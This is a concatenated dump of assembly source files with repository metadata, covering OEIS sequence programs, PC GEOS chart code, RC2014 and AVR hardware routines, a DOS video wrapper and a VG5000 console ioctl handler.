19.337758

81

0.674701

d97bf2422a4800533c65bed7471e4616ee51e9ea

914

asm

Assembly

oeis/262/A262861.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/262/A262861.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/262/A262861.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A262861: Binary representation of the n-th iteration of the "Rule 147" elementary cellular automaton starting with a single ON (black) cell. ; Submitted by Simon Strandgaard ; 1,101,10001,1011101,100010001,10111011101,1000100010001,101110111011101,10001000100010001,1011101110111011101,100010001000100010001,10111011101110111011101,1000100010001000100010001,101110111011101110111011101,10001000100010001000100010001,1011101110111011101110111011101,100010001000100010001000100010001,10111011101110111011101110111011101,1000100010001000100010001000100010001,101110111011101110111011101110111011101,10001000100010001000100010001000100010001 seq $0,262862 ; Decimal representation of the n-th iteration of the "Rule 147" elementary cellular automaton starting with a single ON (black) cell. seq $0,7088 ; The binary numbers (or binary words, or binary vectors, or binary expansion of n): numbers written in base 2.

130.571429

463

0.865427

ff7eeb24d859bbe6c4283f918f9702c86394e128

8,492

asm

Assembly

Library/Chart/CObject/cobjectDual.asm

steakknife/pcgeos

95edd7fad36df400aba9bab1d56e154fc126044a

[ "Apache-2.0" ]

504

2018-11-18T03:35:53.000Z

2022-03-29T01:02:51.000Z

Library/Chart/CObject/cobjectDual.asm

steakknife/pcgeos

95edd7fad36df400aba9bab1d56e154fc126044a

[ "Apache-2.0" ]

96

2018-11-19T21:06:50.000Z

2022-03-06T10:26:48.000Z

Library/Chart/CObject/cobjectDual.asm

steakknife/pcgeos

95edd7fad36df400aba9bab1d56e154fc126044a

[ "Apache-2.0" ]

73

2018-11-19T20:46:53.000Z

2022-03-29T00:59:26.000Z

COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) GeoWorks 1992 -- All Rights Reserved PROJECT: PC GEOS MODULE: FILE: cobjectDual.asm AUTHOR: Chris Boyke ROUTINES: Name Description ---- ----------- REVISION HISTORY: Name Date Description ---- ---- ----------- CDB 5/21/92 Initial version. DESCRIPTION: $Id: cobjectDual.asm,v 1.1 97/04/04 17:46:21 newdeal Exp $ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ChartObjectDualClearAllGrObjes %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DESCRIPTION: Free the 2 grobjes PASS: *ds:si = ChartObjectDualClass object ds:di = ChartObjectDualClass instance data es = Segment of ChartObjectDualClass. RETURN: DESTROYED: nothing REGISTER/STACK USAGE: PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- CDB 5/21/92 Initial version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ChartObjectDualClearAllGrObjes method dynamic ChartObjectDualClass, MSG_CHART_OBJECT_CLEAR_ALL_GROBJES uses ax,cx .enter EC < tst ds:[di].COI_grobj.chunk > EC < ERROR_NZ GROBJ_FIELD_FOR_MULTIPLE_OBJECT_NOT_NULL > mov cx, CODT_FIRST_GROBJ call ChartObjectDualClearGrObj mov cx, CODT_SECOND_GROBJ call ChartObjectDualClearGrObj .leave mov di, offset ChartObjectDualClass GOTO ObjCallSuperNoLock ChartObjectDualClearAllGrObjes endm COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ChartObjectDualClearGrObj %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Free one of the grobjes CALLED BY: PASS: cx - ChartObjectDualType *ds:si - ChartObjectDual object RETURN: nothing DESTROYED: nothing PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- CDB 5/21/92 Initial version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ChartObjectDualClearGrObj proc far .enter call ChartObjectDualGetGrObj call ChartObjectClearAllGrObjes call ChartObjectDualSetGrObj .leave ret ChartObjectDualClearGrObj endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ChartObjectDualGetGrObj %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Get one of the 2 grobj's into the "grobj" field CALLED BY: PASS: cx - ChartObjectDualType *ds:si - ChartObjectDual object RETURN: nothing DESTROYED: nothing PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- CDB 5/21/92 Initial version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ChartObjectDualGetGrObj proc far uses di, bx, ax class ChartObjectDualClass .enter mov di, ds:[si] mov bx, cx add bx, di ; ds:bx - offset to grobj movdw ds:[di].COI_grobj, ds:[bx], ax .leave ret ChartObjectDualGetGrObj endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ChartObjectDualSetGrObj %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Set one of the 2 grobj's from the "grobj" field back to CALLED BY: PASS: cx - ChartObjectDualType *ds:si - ChartObjectDual object RETURN: nothing DESTROYED: nothing PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- CDB 5/21/92 Initial version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ChartObjectDualSetGrObj proc far uses di, bx, ax class ChartObjectDualClass .enter mov di, ds:[si] mov bx, cx add bx, di movdw ds:[bx], ds:[di].COI_grobj, ax clrdw ds:[di].COI_grobj .leave ret ChartObjectDualSetGrObj endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ChartObjectDualFindGrObj %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DESCRIPTION: Return the OD of the PICTURE grobj PASS: *ds:si = ChartObjectDualClass object ds:di = ChartObjectDualClass instance data es = segment of ChartObjectDualClass RETURN: DESTROYED: nothing REGISTER/STACK USAGE: PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- cdb 6/12/92 Initial version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ChartObjectDualFindGrObj method dynamic ChartObjectDualClass, MSG_CHART_OBJECT_FIND_GROBJ .enter movOD cxdx, ds:[di].CODI_grobj1 .leave ret ChartObjectDualFindGrObj endm COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ChartObjectDualSendToGrObj %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DESCRIPTION: PASS: *ds:si - ChartObjectDualClass object ds:di - ChartObjectDualClass instance data es - segment of ChartObjectDualClass structure RETURN: DESTROYED: nothing REGISTER/STACK USAGE: PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- chrisb 1/18/93 Initial version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ChartObjectDualSendToGrObj method dynamic ChartObjectDualClass, MSG_CHART_OBJECT_SEND_TO_GROBJ uses ax,cx,dx,bp .enter mov_tr ax, cx push si movOD bxsi, ds:[di].CODI_grobj1 mov di, mask MF_FIXUP_DS call ObjMessage pop si DerefChartObject ds, si, di movOD bxsi, ds:[di].CODI_grobj2 mov di, mask MF_FIXUP_DS call ObjMessage .leave ret ChartObjectDualSendToGrObj endm COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ChartObjectDualGetGrObjText %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DESCRIPTION: Return the OD of the GrObj text object for this chart object. PASS: *ds:si - ChartObjectDualClass object ds:di - ChartObjectDualClass instance data es - segment of ChartObjectDualClass structure RETURN: ^lcx:dx - VisText object associated with this chart object. DESTROYED: nothing REGISTER/STACK USAGE: PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- chrisb 2/20/93 Initial version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ChartObjectDualGetGrObjText method dynamic ChartObjectDualClass, MSG_CHART_OBJECT_GET_GROBJ_TEXT uses ax,bp .enter mov bx, ds:[di].CODI_grobj2.handle tst bx jz callSuper mov si, ds:[di].CODI_grobj2.chunk mov ax, MSG_GOVG_GET_VIS_WARD_OD mov di, mask MF_CALL or mask MF_FIXUP_DS call ObjMessage done: .leave ret callSuper: mov di, offset ChartObjectDualClass call ObjCallSuperNoLock jmp done ChartObjectDualGetGrObjText endm COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ChartObjectDualGetTopGrObjPosition %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DESCRIPTION: return the position of the text object, if available. PASS: *ds:si - ChartObjectDualClass object ds:di - ChartObjectDualClass instance data es - segment of ChartObjectDualClass structure RETURN: DESTROYED: nothing REGISTER/STACK USAGE: PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- chrisb 10/29/93 Initial version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ChartObjectDualGetTopGrObjPosition method dynamic ChartObjectDualClass, MSG_CHART_OBJECT_GET_TOP_GROBJ_POSITION .enter movdw cxdx, ds:[di].CODI_grobj2 tst cx jnz gotOD movdw cxdx, ds:[di].CODI_grobj1 jcxz done gotOD: mov ax, MSG_GB_FIND_GROBJ call UtilCallChartBody EC < ERROR_NC OBJECT_NOT_FOUND > done: .leave ret ChartObjectDualGetTopGrObjPosition endm

21.943152

73

0.550165

52437544fc3014a4272c0db5a3a0e55a5dd4c65c

439

asm

Assembly

oeis/109/A109916.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

oeis/109/A109916.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

oeis/109/A109916.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A109916: a(n) = n-th digit after decimal point in e^n. ; 7,8,5,1,5,3,4,4,5,7,1,0,3,4,1,0,3,3,7,4,5,4,7,2,9,9,9,0,4,5,0,1,4,1,2,7,3,5,1,6,5,1,9,9,4,5,2,2,0,8,3,0,9,9,8,7,4,7,3,2,3,0,7,1,9,1,4,2,4,7,5,2,4,6,0,7,7,2,3,3,8,1,5,2,3,5,6,2,1,9,2,2,1,5,8,4,2,6,0,6 add $0,1 mov $2,1 mov $3,$0 mul $3,7 lpb $3 mul $1,$0 mul $2,$3 add $1,$2 div $1,$0 div $2,$0 sub $3,1 lpe mov $4,10 pow $4,$0 div $2,$4 div $1,$2 mov $0,$1 mod $0,10

19.954545

201

0.517084

6fa6b530f6ea765793cf96b4010bfe2020e044e6

518

asm

Assembly

programs/oeis/019/A019427.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/019/A019427.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/019/A019427.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A019427: Continued fraction for tan(1/4). ; 0,3,1,10,1,18,1,26,1,34,1,42,1,50,1,58,1,66,1,74,1,82,1,90,1,98,1,106,1,114,1,122,1,130,1,138,1,146,1,154,1,162,1,170,1,178,1,186,1,194,1,202,1,210,1,218,1,226,1,234,1,242,1,250,1,258,1,266,1,274,1,282,1,290,1,298,1,306,1,314,1,322,1,330,1,338,1,346,1,354,1,362,1,370,1,378,1,386,1,394 mul $0,2 mov $3,$0 lpb $0 mov $1,$0 dif $0,2 cmp $2,0 add $3,$2 mod $1,$3 seq $1,92535 ; G.f.: (1+x^2)*(1+x^3)/((1-x)*(1-x^2)). mul $1,2 min $3,1 lpe div $1,2 mov $0,$1

28.777778

287

0.583012

184577a330eb1057960cf9cfc156108db8b34e71

621

asm

Assembly

oeis/060/A060887.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/060/A060887.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/060/A060887.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A060887: a(n) = Sum_{j=0..12} n^j. ; 1,13,8191,797161,22369621,305175781,2612138803,16148168401,78536544841,317733228541,1111111111111,3452271214393,9726655034461,25239592216021,61054982558011,139013933454241,300239975158033,619036127056621,1224880286215951,2336276859014281,4311578947368421,7723618886955973,13467145613480131,22910743724384881,38108188628928601,62088171641031901,99246114928149463,155867505885345241,240818941573998061,366451025462807221,549766551724137931,813918209914834753,1190112520884487201,1720011062295265741 mov $2,11 mov $3,1 add $3,$0 lpb $2 sub $2,1 mul $3,$0 add $3,1 lpe mov $0,$3

47.769231

498

0.845411

35b1da0c5a08160db3b7220a61fa3f000e26ae6a

478

asm

Assembly

programs/oeis/309/A309689.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/309/A309689.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/309/A309689.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

; A309689: Number of even parts appearing among the second largest parts of the partitions of n into 3 parts. ; 0,0,0,0,0,1,2,2,2,3,4,5,6,7,8,9,10,12,14,15,16,18,20,22,24,26,28,30,32,35,38,40,42,45,48,51,54,57,60,63,66,70,74,77,80,84,88,92,96,100,104,108,112,117,122,126,130,135,140,145,150,155,160,165,170 mov $1,$0 add $1,2 mov $2,$1 sub $2,1 mov $0,$2 mov $3,$1 lpb $0,1 trn $0,4 add $0,1 trn $3,2 sub $1,$3 sub $1,2 add $1,$0 sub $0,1 sub $3,4 lpe sub $1,1

22.761905

196

0.627615

1e96dc6d70ea2b7840e8bfc83087428f279e4820

1,218

asm

Assembly

libsrc/_DEVELOPMENT/target/rc2014/device/lut/z80/l_lut_mulu_16_16x8.asm

Frodevan/z88dk

f27af9fe840ff995c63c80a73673ba7ee33fffac

[ "ClArtistic" ]

640

2017-01-14T23:33:45.000Z

2022-03-30T11:28:42.000Z

libsrc/_DEVELOPMENT/target/rc2014/device/lut/z80/l_lut_mulu_16_16x8.asm

Frodevan/z88dk

f27af9fe840ff995c63c80a73673ba7ee33fffac

[ "ClArtistic" ]

1,600

2017-01-15T16:12:02.000Z

2022-03-31T12:11:12.000Z

libsrc/_DEVELOPMENT/target/rc2014/device/lut/z80/l_lut_mulu_16_16x8.asm

Frodevan/z88dk

f27af9fe840ff995c63c80a73673ba7ee33fffac

[ "ClArtistic" ]

215

2017-01-17T10:43:03.000Z

2022-03-23T17:25:02.000Z

; ; feilipu, 2020 January ; ; This Source Code Form is subject to the terms of the Mozilla Public ; License, v. 2.0. If a copy of the MPL was not distributed with this ; file, You can obtain one at http://mozilla.org/MPL/2.0/. ; ;------------------------------------------------------------------------------ ; ; Using RC2014 LUT Module ; ;------------------------------------------------------------------------------ INCLUDE "config_private.inc" SECTION code_clib SECTION code_math PUBLIC l_lut_mulu_16_16x8 ex de,hl l_lut_mulu_16_16x8: ; multiplication of a 16-bit number by an 8-bit number into 16-bit product ; ; enter : l = 8-bit multiplier ; de = 16-bit multiplicand ; ; exit : hl = 16-bit product ; carry reset ; ; uses : af, bc, de, hl ld c,__IO_LUT_OPERAND_LATCH ; operand latch address ld b,l out (c),e ; multiply lsb in l,(c) ; lsb inc c in h,(c) ; msb dec c ; operand latch address out (c),d in a,(c) add a,h ; add to msb final ld h,a ; hl = final xor a ret

23.423077

79

0.471264

91f8fbff3deb3ea39562e71b42e3f65b4ef7cc86

999

asm

Assembly

bvs/BvsSetMode.asm

osfree-project/FamilyAPI

2119a95cb2bbe6716ecacff4171866f6ea51b8d7

[ "BSD-3-Clause" ]

null

bvs/BvsSetMode.asm

osfree-project/FamilyAPI

2119a95cb2bbe6716ecacff4171866f6ea51b8d7

[ "BSD-3-Clause" ]

null

bvs/BvsSetMode.asm

osfree-project/FamilyAPI

2119a95cb2bbe6716ecacff4171866f6ea51b8d7

[ "BSD-3-Clause" ]

null

;/*! ; @file ; ; @brief BvsSetMode DOS wrapper ; ; (c) osFree Project 2008-2022, <http://www.osFree.org> ; for licence see licence.txt in root directory, or project website ; ; This is Family API implementation for DOS, used with BIND tools ; to link required API ; ; @author Yuri Prokushev (yuri.prokushev@gmail.com) ; ; * 0 NO_ERROR ; * 355 ERROR_VIO_MODE ; * 358 ERROR_VIO_ROW ; * 359 ERROR_VIO_COL ; * 436 ERROR_VIO_INVALID_HANDLE ; * 465 ERROR_VIO_DETACHED ; ;*/ .8086 ; Helpers INCLUDE helpers.inc INCLUDE dos.inc INCL_SUB EQU 1 INCLUDE bseerr.inc INCLUDE bsesub.inc _TEXT SEGMENT BYTE PUBLIC 'CODE' USE16 @BVSPROLOG BVSSETMODE VIOHANDLE DW ? ;Video handle MODEDATA DD ? ;Video mode info @BVSSTART BVSSETMODE EXTERN VIOCHECKHANDLE: PROC MOV BX,[DS:BP].ARGS.VIOHANDLE ; GET HANDLE CALL VIOCHECKHANDLE JNZ EXIT MOV AX, ERROR_VIO_MODE EXIT: @BVSEPILOG BVSSETMODE _TEXT ENDS END

19.98

69

0.668669

a5fa893f2411fdad4c1a41392a14cdf13738b740

758

asm

Assembly

scratchpad/AVR053/code/Device specific/m88.asm

Railstars/Aegaeon

f87a9c6d551cfef9381bc8ea77a5f870b509791b

[ "CC-BY-3.0" ]

5

2015-10-08T16:23:23.000Z

2022-02-14T09:02:41.000Z

scratchpad/AVR053/code/Device specific/m88.asm

Railstars/Aegaeon

f87a9c6d551cfef9381bc8ea77a5f870b509791b

[ "CC-BY-3.0" ]

null

scratchpad/AVR053/code/Device specific/m88.asm

Railstars/Aegaeon

f87a9c6d551cfef9381bc8ea77a5f870b509791b

[ "CC-BY-3.0" ]

5

2018-06-07T08:10:01.000Z

2021-02-27T01:05:17.000Z

;***************************************************************** ;* - Description: Device definition file for RC Calibration ;* - File: m88.asm ;* - AppNote: AVR053 - Production calibration of the ;* RC oscillator ;* ;* - Author: Atmel Corporation: http://www.atmel.com ;* Support email: avr@atmel.com ;* ;* $Name$ ;* $Revision: 56 $ ;* $RCSfile$ ;* $Date: 2006-02-16 17:44:45 +0100 (to, 16 feb 2006) $ ;***************************************************************** .include "m88def.inc" .include "Common\memoryMap.inc" .include "Device specific\m8_family_pinout.inc" .EQU OSC_VER = 5 .equ TCCR0 = TCCR0B .equ TIFR = TIFR0 .equ EEMWE = EEMPE .equ EEWE = EEPE

27.071429

67

0.480211

5a1c4f130da4f35bf9a804a8c356a3e79065588c

717

asm

Assembly

oeis/045/A045428.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/045/A045428.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/045/A045428.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A045428: Primes congruent to {1, 3, 4} mod 5. ; Submitted by Jon Maiga ; 3,11,13,19,23,29,31,41,43,53,59,61,71,73,79,83,89,101,103,109,113,131,139,149,151,163,173,179,181,191,193,199,211,223,229,233,239,241,251,263,269,271,281,283,293,311,313,331,349,353,359,373,379,383,389,401,409,419,421,431,433,439,443,449,461,463,479,491,499,503,509,521,523,541,563,569,571,593,599,601,613,619,631,641,643,653,659,661,673,683,691,701,709,719,733,739,743,751,761,769 mov $1,3 mov $2,332202 lpb $2 mov $3,$6 seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0. sub $0,$3 add $1,5 mov $4,$0 max $4,0 cmp $4,$0 mul $2,$4 sub $2,18 add $5,$1 div $5,4 mov $6,$5 lpe mov $0,$5 add $0,1

31.173913

383

0.662483

479cc42cc28f105a6e6e3634c8914370390f4464

688

asm

Assembly

oeis/159/A159850.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/159/A159850.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/159/A159850.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A159850: Numerator of Hermite(n, 17/22). ; Submitted by Christian Krause ; 1,17,47,-7429,-160415,4464217,269993839,-1892147821,-489536076223,-4658915114335,987008017069999,28053710866880683,-2150502256703365727,-118026514721378720791,4759029349325350323695,480777330814562061542723,-9102061914203466628786559,-2016304877455443234982794959,3168699798290526716120389423,8836891942766849685759101461595,135657481354496602817183174280161,-40464379819965110231181937111357063,-1377305777182958609447017822584848273,192018159949383950510213330196922582771 add $0,1 mov $3,1 lpb $0 sub $0,1 add $2,$3 mov $3,$1 mov $1,$2 mul $2,17 mul $3,-1 mul $3,$0 mul $3,242 lpe mov $0,$1

38.222222

476

0.815407

94ed0d9e5301a6bca83ead5af6db87f4e73f8101

761

asm

Assembly

libsrc/target/vg5k/stdio/generic_console_ioctl.asm

Frodevan/z88dk

f27af9fe840ff995c63c80a73673ba7ee33fffac

[ "ClArtistic" ]

38

2021-06-18T12:56:15.000Z

2022-03-12T20:38:40.000Z

libsrc/target/vg5k/stdio/generic_console_ioctl.asm

Frodevan/z88dk

f27af9fe840ff995c63c80a73673ba7ee33fffac

[ "ClArtistic" ]

2

2021-06-20T16:28:12.000Z

2021-11-17T21:33:56.000Z

libsrc/target/vg5k/stdio/generic_console_ioctl.asm

Frodevan/z88dk

f27af9fe840ff995c63c80a73673ba7ee33fffac

[ "ClArtistic" ]

6

2021-06-18T18:18:36.000Z

2021-12-22T08:01:32.000Z

MODULE generic_console_ioctl PUBLIC generic_console_ioctl EXTERN set_character8 EXTERN __vg5k_custom_font SECTION code_clib INCLUDE "ioctl.def" PUBLIC CLIB_GENCON_CAPS defc CLIB_GENCON_CAPS = CAP_GENCON_FG_COLOUR | CAP_GENCON_CUSTOM_FONT | CAP_GENCON_UDGS ; a = ioctl ; de = arg generic_console_ioctl: ex de,hl ld c,(hl) ;hl = source inc hl ld h,(hl) ld l,c cp IOCTL_GENCON_SET_FONT32 jr nz,check_set_udg ld a,1 ld (__vg5k_custom_font),a ld b,96 ld c,32 set_font: push bc push hl call set_character8 pop hl pop bc inc c ld de,8 add hl,de djnz set_font success: and a ret check_set_udg: cp IOCTL_GENCON_SET_UDGS jr nz,failure ld b,128 - 32 ld c,128 + 32 jr set_font failure: scf ret

14.634615

106

0.717477

4a0c15d4154eccc2533d2563de3a3b1fa72b6323

242

asm

Assembly

src/programs/bouncing_ball.asm

ida-n/8bit-emulator

5a744ee698199d750756e3e6a7297eb0fff8dbcd

[ "MIT" ]

6

2019-11-22T16:39:17.000Z

2022-01-21T03:33:52.000Z

src/programs/bouncing_ball.asm

ida-n/8bit-emulator

5a744ee698199d750756e3e6a7297eb0fff8dbcd

[ "MIT" ]

3

2019-11-22T18:49:40.000Z

2019-11-22T18:51:19.000Z

src/programs/bouncing_ball.asm

ida-n/8bit-emulator

5a744ee698199d750756e3e6a7297eb0fff8dbcd

[ "MIT" ]

1

2019-11-09T21:36:08.000Z

# a ball that bounces around the edged of the screen jmp .loop .loop jsr .moveball jsr .delay jmp .loop # moves the ball position, bounces on collision .moveball # TODO .jmr # TODO delay clock so game loop isnt too fast .delay .jmr

13.444444

52

0.719008

187146f3eee572952aea0bc6df81054c64a7415d

504

asm

Assembly

oeis/010/A010642.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/010/A010642.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/010/A010642.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A010642: Decimal expansion of cube root of 72. ; Submitted by Jon Maiga ; 4,1,6,0,1,6,7,6,4,6,1,0,3,8,0,8,2,2,9,0,6,0,1,1,3,6,4,8,7,1,5,7,7,0,7,7,2,6,7,5,6,1,0,6,8,0,7,4,6,5,2,4,2,1,9,3,9,5,1,8,2,1,6,0,4,0,0,2,1,2,6,2,2,7,9,4,5,3,7,5,4,7,2,1,2,1,1,3,2,7,3,5,8,1,5,1,4,9,7,3 mov $3,$0 mul $3,3 mov $5,1 lpb $3 add $1,$2 mul $1,4 add $5,$2 add $1,$5 add $2,$1 mul $1,2 sub $3,1 lpe mov $1,1 add $1,$5 mul $1,2 mov $4,10 pow $4,$0 div $2,$4 cmp $6,0 add $2,$6 div $1,$2 mov $0,$1 mod $0,10

18

201

0.535714

688835aa4688e0aa45a81d599a0bdf2ffb1e97c2

4,910

asm

Assembly

Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_21829_1388.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

9

2020-08-13T19:41:58.000Z

2022-03-30T12:22:51.000Z

Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_21829_1388.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

1

2021-04-29T06:29:35.000Z

2021-05-13T21:02:30.000Z

Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_21829_1388.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

3

2020-07-14T17:07:07.000Z

2022-03-21T01:12:22.000Z

